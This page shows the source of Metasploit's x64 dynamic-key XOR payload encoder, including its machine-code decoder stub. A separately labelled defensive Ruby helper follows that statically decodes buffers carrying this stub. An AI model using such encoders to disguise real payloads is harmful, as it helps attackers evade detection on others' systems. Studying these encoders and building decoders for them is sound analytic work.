Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/encoders/x64/xor_dynamic.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Encoder::XorDynamic

  def initialize
    super(
      'Name' => 'Dynamic key XOR Encoder',
      'Description' => 'An x64 XOR encoder with dynamic key size',
      'Author' => [ 'lupman', 'phra' ],
      'Arch' => ARCH_X64,
      'License' => MSF_LICENSE
    )
  end

  # Indicate that this module can preserve some registers
  # ...which is currently not true. This is a temp fix
  # until the full preserve_registers functionality is
  # implemented.
  def can_preserve_registers?
    true
  end

  def stub
    "\xeb\x27" +             #        jmp    _call
    "\x5b" +                 # _ret:  pop    rbx
    "\x53" +                 #        push   rbx
    "\x5f" +                 #        pop    rdi
    "\xb0\x41" +             #        mov    al, 'A'
    "\xfc" +                 #        cld
    "\xae" +                 # _lp1:  scas   al, BYTE PTR es:[rdi]
    "\x75\xfd" +             #        jne    _lp1
    "\x57" +                 #        push   rdi
    "\x59" +                 #        pop    rcx
    "\x53" +                 # _lp2:  push   rbx
    "\x5e" +                 #        pop    rsi
    "\x8a\x06" +             # _lp3:  mov    al, BYTE PTR [rsi]
    "\x30\x07" +             #        xor    BYTE PTR [rdi], al
    "\x48\xff\xc7" +         #        inc    rdi
    "\x48\xff\xc6" +         #        inc    rsi
    "\x66\x81\x3f\x42\x42" + #        cmp    WORD PTR [rdi], 'BB'
    "\x74\x07" +             #        je     _jmp
    "\x80\x3e\x41" +         #        cmp    BYTE PTR [rsi], 'A'
    "\x75\xea" +             #        jne    _lp3
    "\xeb\xe6" +             #        jmp    _lp2
    "\xff\xe1" +             # _jmp:  jmp    rcx
    "\xe8\xd4\xff\xff\xff"   # _call: call   _ret
  end

  def stub_key_term
    /A/
  end

  def stub_payload_term
    /BB/
  end
end
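Added example, not part of the Metasploit module above: an analyst-side Ruby helper that statically reverses what the stub does at run time, for triaging a captured buffer that begins with this stub. The layout (stub, key, key terminator, encoded payload, two-byte payload terminator) is read off the stub's instructions; the names `STUB`, `xor_dynamic_decode` and `constructed_sample` and the sample bytes are constructed for illustration.

```ruby
# Added example: static decoder for buffers that start with the stub above.
# Layout inferred from the stub: <stub> <key> KT <encoded payload> PT PT
# (KT = imm8 of `mov al`, PT PT = imm16 of `cmp WORD PTR [rdi]`).

# Stub bytes as listed in the module; ?? marks the terminator immediates.
STUB = %w[eb 27 5b 53 5f b0 ?? fc ae 75 fd 57 59 53 5e 8a 06 30 07 48 ff c7
          48 ff c6 66 81 3f ?? ?? 74 07 80 3e ?? 75 ea eb e6 ff e1 e8 d4 ff
          ff ff].map { |h| h == '??' ? nil : h.hex }.freeze

# Returns { key:, payload: } as binary strings, or nil if buf is malformed.
def xor_dynamic_decode(buf)
  bytes = buf.bytes
  return nil unless bytes.size > STUB.size &&
                    STUB.each_with_index.all? { |b, i| b.nil? || bytes[i] == b }

  key_term = bytes[6]                      # mov al, KT
  return nil unless bytes[34] == key_term  # cmp BYTE PTR [rsi], KT must agree
  pay_term = bytes[28, 2]                  # cmp WORD PTR [rdi], PT PT

  data = bytes.drop(STUB.size)             # what rbx points at after `pop rbx`
  klen = data.index(key_term)              # scas loop: first KT ends the key
  return nil if klen.nil? || klen.zero?

  start = klen + 1                         # rcx: first encoded byte
  # The stub XORs one byte before its first terminator test, and tests
  # bytes that are still encoded, so search the raw data from start + 1.
  stop = (start + 1...data.size - 1).find { |i| data[i, 2] == pay_term }
  return nil if stop.nil?

  key = data[0, klen]
  payload = data[start...stop].each_with_index.map { |b, i| b ^ key[i % klen] }
  { key: key.pack('C*'), payload: payload.pack('C*') }
end

# Constructed sample: stub with the page's 'A' / 'BB' terminators, key 13 37,
# and a harmless ASCII string XORed with that key (not real shellcode).
def constructed_sample
  stub = STUB.each_with_index.map { |b, i| b || ([28, 29].include?(i) ? 0x42 : 0x41) }
  data = ['133741' '7d58671a605f765b7f547c5376' '4242'].pack('H*').bytes
  (stub + data).pack('C*')
end

p xor_dynamic_decode(constructed_sample)
```

The decoder reads both terminators from the stub's immediates rather than hard-coding `A` and `BB`, and returns `nil` when the key is empty or the payload terminator never appears.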